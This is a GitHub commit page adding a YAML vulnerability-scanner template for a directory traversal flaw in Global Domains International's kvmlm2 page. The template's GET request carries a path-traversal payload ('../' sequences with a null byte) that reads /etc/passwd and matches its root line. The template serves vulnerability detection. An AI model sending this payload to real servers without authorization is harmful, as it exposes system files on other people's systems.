Merge pull request #3357 from Akokonunes/patch-90

Create global-domains-lfi.yaml
patch-1
Prince Chaddha 2021-12-18 14:52:35 +05:30 committed by GitHub
commit 71027cbc79
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 25 additions and 0 deletions

View File

@ -0,0 +1,25 @@
id: global-domains-lfi
info:
name: Global Domains International Directory traversal Vulnerability
author: 0x_Akoko
severity: high
reference:
- https://cxsecurity.com/issue/WLB-2018020247
- http://www.nic.ws
tags: globaldomains,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200